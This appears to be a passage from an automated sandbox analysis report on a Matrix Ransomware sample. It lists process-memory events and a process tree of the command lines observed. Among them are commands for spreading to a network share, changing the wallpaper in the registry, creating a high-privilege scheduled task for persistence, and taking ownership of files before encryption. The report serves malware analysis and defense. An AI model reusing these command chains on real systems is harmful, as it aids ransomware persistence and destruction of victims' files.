8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 470 PID 5888 wrote to memory of 5600 5888 cmd.exe 472 PID 5888 wrote to memory of 5600 5888 cmd.exe 472 PID 5888 wrote to memory of 5600 5888 cmd.exe 472 PID 5888 wrote to memory of 5492 5888 cmd.exe 473 PID 5888 wrote to memory of 5492 5888 cmd.exe 473 PID 5888 wrote to memory of 5492 5888 cmd.exe 473 PID 5888 wrote to memory of 5996 5888 cmd.exe 474 PID 5888 wrote to memory of 5996 5888 cmd.exe 474 PID 5888 wrote to memory of 5996 5888 cmd.exe 474 PID 5996 wrote to memory of 6044 5996 cmd.exe 475 PID 5996 wrote to memory of 6044 5996 cmd.exe 475 PID 5996 wrote to memory of 6044 5996 cmd.exe 475 PID 5888 wrote to memory of 5952 5888 cmd.exe 476 PID 5888 wrote to memory of 5952 5888 cmd.exe 476 PID 5888 wrote to memory of 5952 5888 cmd.exe 476 PID 2196 wrote to memory of 5780 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 477 PID 2196 wrote to memory of 5780 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 477 PID 2196 wrote to memory of 5780 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 477 PID 5780 wrote to memory of 5788 5780 cmd.exe 479 PID 5780 wrote to memory of 5788 5780 cmd.exe 479 PID 5780 wrote to memory of 5788 5780 cmd.exe 479 PID 5780 wrote to memory of 4852 5780 cmd.exe 480 PID 5780 wrote to memory of 4852 5780 cmd.exe 480 PID 5780 wrote to memory of 4852 5780 cmd.exe 480 PID 5780 wrote to memory of 6084 5780 cmd.exe 481 PID 5780 wrote to memory of 6084 5780 cmd.exe 481 PID 5780 wrote to memory of 6084 5780 cmd.exe 481 PID 6084 wrote to memory of 5132 6084 cmd.exe 482 PID 6084 wrote to memory of 5132 6084 cmd.exe 482 PID 6084 wrote to memory of 5132 6084 cmd.exe 482 PID 5780 wrote to memory of 6088 5780 cmd.exe 483 PID 5780 wrote to memory of 6088 5780 cmd.exe 483 PID 5780 wrote to memory of 6088 5780 cmd.exe 483 PID 2196 wrote to memory of 5140 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 484 PID 2196 wrote to memory of 5140 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 484 PID 2196 wrote to memory of 5140 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 484 PID 5140 wrote to memory of 5344 5140 cmd.exe 486 PID 5140 wrote to memory of 5344 5140 cmd.exe 486 PID 5140 wrote to memory of 5344 5140 cmd.exe 486 PID 5140 wrote to memory of 5308 5140 cmd.exe 487 PID 5140 wrote to memory of 5308 5140 cmd.exe 487 PID 5140 wrote to memory of 5308 5140 cmd.exe 487 PID 5140 wrote to memory of 5200 5140 cmd.exe 488 PID 5140 wrote to memory of 5200 5140 cmd.exe 488 PID 5140 wrote to memory of 5200 5140 cmd.exe 488 PID 5200 wrote to memory of 5480 5200 cmd.exe 489 PID 5200 wrote to memory of 5480 5200 cmd.exe 489 PID 5200 wrote to memory of 5480 5200 cmd.exe 489 PID 5140 wrote to memory of 5304 5140 cmd.exe 490 PID 5140 wrote to memory of 5304 5140 cmd.exe 490 PID 5140 wrote to memory of 5304 5140 cmd.exe 490 PID 2196 wrote to memory of 5424 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 491 PID 2196 wrote to memory of 5424 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 491 PID 2196 wrote to memory of 5424 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 491 PID 5424 wrote to memory of 5732 5424 cmd.exe 493 PID 5424 wrote to memory of 5732 5424 cmd.exe 493 PID 5424 wrote to memory of 5732 5424 cmd.exe 493 PID 5424 wrote to memory of 5544 5424 cmd.exe 494 PID 5424 wrote to memory of 5544 5424 cmd.exe 494 PID 5424 wrote to memory of 5544 5424 cmd.exe 494 PID 5424 wrote to memory of 5824 5424 cmd.exe 495 PID 5424 wrote to memory of 5824 5424 cmd.exe 495 PID 5424 wrote to memory of 5824 5424 cmd.exe 495 PID 5824 wrote to memory of 5632 5824 cmd.exe 496 PID 5824 wrote to memory of 5632 5824 cmd.exe 496 PID 5824 wrote to memory of 5632 5824 cmd.exe 496 PID 5424 wrote to memory of 5852 5424 cmd.exe 497 PID 5424 wrote to memory of 5852 5424 cmd.exe 497 PID 5424 wrote to memory of 5852 5424 cmd.exe 497 PID 2196 wrote to memory of 5648 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 498 PID 2196 wrote to memory of 5648 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 498 PID 2196 wrote to memory of 5648 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 498 PID 5648 wrote to memory of 6068 5648 cmd.exe 500 PID 5648 wrote to memory of 6068 5648 cmd.exe 500 PID 5648 wrote to memory of 6068 5648 cmd.exe 500 PID 5648 wrote to memory of 5876 5648 cmd.exe 501 PID 5648 wrote to memory of 5876 5648 cmd.exe 501 PID 5648 wrote to memory of 5876 5648 cmd.exe 501 PID 5648 wrote to memory of 5916 5648 cmd.exe 502 PID 5648 wrote to memory of 5916 5648 cmd.exe 502 PID 5648 wrote to memory of 5916 5648 cmd.exe 502 PID 5916 wrote to memory of 5760 5916 cmd.exe 503 PID 5916 wrote to memory of 5760 5916 cmd.exe 503 PID 5916 wrote to memory of 5760 5916 cmd.exe 503 PID 5648 wrote to memory of 6076 5648 cmd.exe 504 PID 5648 wrote to memory of 6076 5648 cmd.exe 504 PID 5648 wrote to memory of 6076 5648 cmd.exe 504 PID 2196 wrote to memory of 5128 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 505 PID 2196 wrote to memory of 5128 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 505 PID 2196 wrote to memory of 5128 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 505 PID 5128 wrote to memory of 5900 5128 cmd.exe 507 PID 5128 wrote to memory of 5900 5128 cmd.exe 507 PID 5128 wrote to memory of 5900 5128 cmd.exe 507 PID 5128 wrote to memory of 5656 5128 cmd.exe 508 PID 5128 wrote to memory of 5656 5128 cmd.exe 508 PID 5128 wrote to memory of 5656 5128 cmd.exe 508 PID 5128 wrote to memory of 5172 5128 cmd.exe 509 PID 5128 wrote to memory of 5172 5128 cmd.exe 509 PID 5128 wrote to memory of 5172 5128 cmd.exe 509 PID 5172 wrote to memory of 1544 5172 cmd.exe 510 PID 5172 wrote to memory of 1544 5172 cmd.exe 510 PID 5172 wrote to memory of 1544 5172 cmd.exe 510 PID 5128 wrote to memory of 5548 5128 cmd.exe 511 PID 5128 wrote to memory of 5548 5128 cmd.exe 511 PID 5128 wrote to memory of 5548 5128 cmd.exe 511 PID 2196 wrote to memory of 5180 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 512 PID 2196 wrote to memory of 5180 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 512 PID 2196 wrote to memory of 5180 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 512 PID 5180 wrote to memory of 5236 5180 cmd.exe 514 PID 5180 wrote to memory of 5236 5180 cmd.exe 514 PID 5180 wrote to memory of 5236 5180 cmd.exe 514 PID 5180 wrote to memory of 5572 5180 cmd.exe 515 PID 5180 wrote to memory of 5572 5180 cmd.exe 515 PID 5180 wrote to memory of 5572 5180 cmd.exe 515 PID 5180 wrote to memory of 5844 5180 cmd.exe 516 PID 5180 wrote to memory of 5844 5180 cmd.exe 516 PID 5180 wrote to memory of 5844 5180 cmd.exe 516 PID 5844 wrote to memory of 5604 5844 cmd.exe 517 PID 5844 wrote to memory of 5604 5844 cmd.exe 517 PID 5844 wrote to memory of 5604 5844 cmd.exe 517 PID 5180 wrote to memory of 5476 5180 cmd.exe 518 PID 5180 wrote to memory of 5476 5180 cmd.exe 518 PID 5180 wrote to memory of 5476 5180 cmd.exe 518 PID 2196 wrote to memory of 5668 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 519 PID 2196 wrote to memory of 5668 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 519 PID 2196 wrote to memory of 5668 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 519 PID 5668 wrote to memory of 5948 5668 cmd.exe 521 PID 5668 wrote to memory of 5948 5668 cmd.exe 521 PID 5668 wrote to memory of 5948 5668 cmd.exe 521 PID 5668 wrote to memory of 5848 5668 cmd.exe 522 PID 5668 wrote to memory of 5848 5668 cmd.exe 522 PID 5668 wrote to memory of 5848 5668 cmd.exe 522 PID 5668 wrote to memory of 1608 5668 cmd.exe 523 PID 5668 wrote to memory of 1608 5668 cmd.exe 523 PID 5668 wrote to memory of 1608 5668 cmd.exe 523 PID 1608 wrote to memory of 5944 1608 cmd.exe 524 PID 1608 wrote to memory of 5944 1608 cmd.exe 524 PID 1608 wrote to memory of 5944 1608 cmd.exe 524 PID 5668 wrote to memory of 6104 5668 cmd.exe 525 PID 5668 wrote to memory of 6104 5668 cmd.exe 525 PID 5668 wrote to memory of 6104 5668 cmd.exe 525 PID 2196 wrote to memory of 6016 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 526 PID 2196 wrote to memory of 6016 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 526 PID 2196 wrote to memory of 6016 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 526 PID 6016 wrote to memory of 5772 6016 cmd.exe 528 PID 6016 wrote to memory of 5772 6016 cmd.exe 528 PID 6016 wrote to memory of 5772 6016 cmd.exe 528 PID 6016 wrote to memory of 5428 6016 cmd.exe 529 PID 6016 wrote to memory of 5428 6016 cmd.exe 529 PID 6016 wrote to memory of 5428 6016 cmd.exe 529 PID 6016 wrote to memory of 5256 6016 cmd.exe 530 PID 6016 wrote to memory of 5256 6016 cmd.exe 530 PID 6016 wrote to memory of 5256 6016 cmd.exe 530 PID 5256 wrote to memory of 5224 5256 cmd.exe 531 PID 5256 wrote to memory of 5224 5256 cmd.exe 531 PID 5256 wrote to memory of 5224 5256 cmd.exe 531 PID 6016 wrote to memory of 4456 6016 cmd.exe 532 PID 6016 wrote to memory of 4456 6016 cmd.exe 532 PID 6016 wrote to memory of 4456 6016 cmd.exe 532 PID 2196 wrote to memory of 948 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 533 PID 2196 wrote to memory of 948 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 533 PID 2196 wrote to memory of 948 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 533 PID 948 wrote to memory of 5488 948 cmd.exe 535 PID 948 wrote to memory of 5488 948 cmd.exe 535 PID 948 wrote to memory of 5488 948 cmd.exe 535 PID 948 wrote to memory of 5716 948 cmd.exe 536 PID 948 wrote to memory of 5716 948 cmd.exe 536 PID 948 wrote to memory of 5716 948 cmd.exe 536 PID 948 wrote to memory of 5928 948 cmd.exe 537 PID 948 wrote to memory of 5928 948 cmd.exe 537 PID 948 wrote to memory of 5928 948 cmd.exe 537 PID 5928 wrote to memory of 5460 5928 cmd.exe 538 PID 5928 wrote to memory of 5460 5928 cmd.exe 538 PID 5928 wrote to memory of 5460 5928 cmd.exe 538 PID 948 wrote to memory of 5980 948 cmd.exe 539 PID 948 wrote to memory of 5980 948 cmd.exe 539 PID 948 wrote to memory of 5980 948 cmd.exe 539 PID 2196 wrote to memory of 2480 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 540 PID 2196 wrote to memory of 2480 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 540 PID 2196 wrote to memory of 2480 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 540 PID 2480 wrote to memory of 5924 2480 cmd.exe 542 PID 2480 wrote to memory of 5924 2480 cmd.exe 542 PID 2480 wrote to memory of 5924 2480 cmd.exe 542 PID 2480 wrote to memory of 5536 2480 cmd.exe 543 PID 2480 wrote to memory of 5536 2480 cmd.exe 543 PID 2480 wrote to memory of 5536 2480 cmd.exe 543 PID 2480 wrote to memory of 5564 2480 cmd.exe 544 PID 2480 wrote to memory of 5564 2480 cmd.exe 544 PID 2480 wrote to memory of 5564 2480 cmd.exe 544 PID 5564 wrote to memory of 5316 5564 cmd.exe 545 PID 5564 wrote to memory of 5316 5564 cmd.exe 545 PID 5564 wrote to memory of 5316 5564 cmd.exe 545 PID 2480 wrote to memory of 3596 2480 cmd.exe 546 PID 2480 wrote to memory of 3596 2480 cmd.exe 546 PID 2480 wrote to memory of 3596 2480 cmd.exe 546 PID 2196 wrote to memory of 6128 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 547 PID 2196 wrote to memory of 6128 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 547 PID 2196 wrote to memory of 6128 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 547 PID 6128 wrote to memory of 5340 6128 cmd.exe 549 PID 6128 wrote to memory of 5340 6128 cmd.exe 549 PID 6128 wrote to memory of 5340 6128 cmd.exe 549 PID 6128 wrote to memory of 5756 6128 cmd.exe 550 PID 6128 wrote to memory of 5756 6128 cmd.exe 550 PID 6128 wrote to memory of 5756 6128 cmd.exe 550 PID 6128 wrote to memory of 5468 6128 cmd.exe 551 PID 6128 wrote to memory of 5468 6128 cmd.exe 551 PID 6128 wrote to memory of 5468 6128 cmd.exe 551 PID 5468 wrote to memory of 5736 5468 cmd.exe 552 PID 5468 wrote to memory of 5736 5468 cmd.exe 552 PID 5468 wrote to memory of 5736 5468 cmd.exe 552 PID 6128 wrote to memory of 5372 6128 cmd.exe 553 PID 6128 wrote to memory of 5372 6128 cmd.exe 553 PID 6128 wrote to memory of 5372 6128 cmd.exe 553 PID 2196 wrote to memory of 6060 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 554 PID 2196 wrote to memory of 6060 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 554 PID 2196 wrote to memory of 6060 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 554 PID 6060 wrote to memory of 5832 6060 cmd.exe 556 PID 6060 wrote to memory of 5832 6060 cmd.exe 556 PID 6060 wrote to memory of 5832 6060 cmd.exe 556 PID 6060 wrote to memory of 5652 6060 cmd.exe 557 PID 6060 wrote to memory of 5652 6060 cmd.exe 557 PID 6060 wrote to memory of 5652 6060 cmd.exe 557 PID 6060 wrote to memory of 5700 6060 cmd.exe 558 PID 6060 wrote to memory of 5700 6060 cmd.exe 558 PID 6060 wrote to memory of 5700 6060 cmd.exe 558 PID 5700 wrote to memory of 5912 5700 cmd.exe 559 PID 5700 wrote to memory of 5912 5700 cmd.exe 559 PID 5700 wrote to memory of 5912 5700 cmd.exe 559 PID 6060 wrote to memory of 5296 6060 cmd.exe 560 PID 6060 wrote to memory of 5296 6060 cmd.exe 560 PID 6060 wrote to memory of 5296 6060 cmd.exe 560 PID 2196 wrote to memory of 5984 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 561 PID 2196 wrote to memory of 5984 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 561 PID 2196 wrote to memory of 5984 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 561 PID 5984 wrote to memory of 5792 5984 cmd.exe 563 PID 5984 wrote to memory of 5792 5984 cmd.exe 563 PID 5984 wrote to memory of 5792 5984 cmd.exe 563 PID 5984 wrote to memory of 5748 5984 cmd.exe 564 PID 5984 wrote to memory of 5748 5984 cmd.exe 564 PID 5984 wrote to memory of 5748 5984 cmd.exe 564 PID 5984 wrote to memory of 5204 5984 cmd.exe 565 PID 5984 wrote to memory of 5204 5984 cmd.exe 565 PID 5984 wrote to memory of 5204 5984 cmd.exe 565 PID 5204 wrote to memory of 5408 5204 cmd.exe 566 PID 5204 wrote to memory of 5408 5204 cmd.exe 566 PID 5204 wrote to memory of 5408 5204 cmd.exe 566 PID 5984 wrote to memory of 5376 5984 cmd.exe 567 PID 5984 wrote to memory of 5376 5984 cmd.exe 567 PID 5984 wrote to memory of 5376 5984 cmd.exe 567 PID 2196 wrote to memory of 5640 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 568 PID 2196 wrote to memory of 5640 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 568 PID 2196 wrote to memory of 5640 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 568 PID 5640 wrote to memory of 2472 5640 cmd.exe 570 PID 5640 wrote to memory of 2472 5640 cmd.exe 570 PID 5640 wrote to memory of 2472 5640 cmd.exe 570 PID 5640 wrote to memory of 5280 5640 cmd.exe 571 PID 5640 wrote to memory of 5280 5640 cmd.exe 571 PID 5640 wrote to memory of 5280 5640 cmd.exe 571 PID 5640 wrote to memory of 5456 5640 cmd.exe 572 PID 5640 wrote to memory of 5456 5640 cmd.exe 572 PID 5640 wrote to memory of 5456 5640 cmd.exe 572 PID 5456 wrote to memory of 5740 5456 cmd.exe 573 PID 5456 wrote to memory of 5740 5456 cmd.exe 573 PID 5456 wrote to memory of 5740 5456 cmd.exe 573 PID 5640 wrote to memory of 5396 5640 cmd.exe 574 PID 5640 wrote to memory of 5396 5640 cmd.exe 574 PID 5640 wrote to memory of 5396 5640 cmd.exe 574 PID 3860 wrote to memory of 5516 3860 NW2KZAaA.exe 575 PID 3860 wrote to memory of 5516 3860 NW2KZAaA.exe 575 PID 3860 wrote to memory of 5516 3860 NW2KZAaA.exe 575
Processes
-
C:\Users\Admin\AppData\Local\Temp\8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe"C:\Users\Admin\AppData\Local\Temp\8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe" "C:\Users\Admin\AppData\Local\Temp\NW2KZAaA.exe"2⤵PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\NW2KZAaA.exe"C:\Users\Admin\AppData\Local\Temp\NW2KZAaA.exe" -n2⤵
- Executes dropped EXE
PID:3860 -
C:\Users\Admin\AppData\Local\Temp\NW2KZAaA.exe"C:\Users\Admin\AppData\Local\Temp\NW2KZAaA.exe" "\\10.10.0.73\C$"3⤵PID:5516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7f00h8kS.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7f00h8kS.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:4172
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4216
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:4276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\X9RKMZnA.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\X9RKMZnA.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\mLqKlmID.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\mLqKlmID.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4556
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4712
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:4336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu64.exedgFQYQPu.exe -accepteula "SmsInterceptStore.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "classes.jsa" -nobanner3⤵PID:4820
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4840
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵PID:4924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:4972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:5004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "qmgr.db" -nobanner3⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
PID:5040
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:5084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:3904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:804
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4380
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:504
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""2⤵PID:2144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C3⤵PID:4572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "MsSense.exe.mui" -nobanner3⤵PID:4548
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "MsSense.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4632
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵
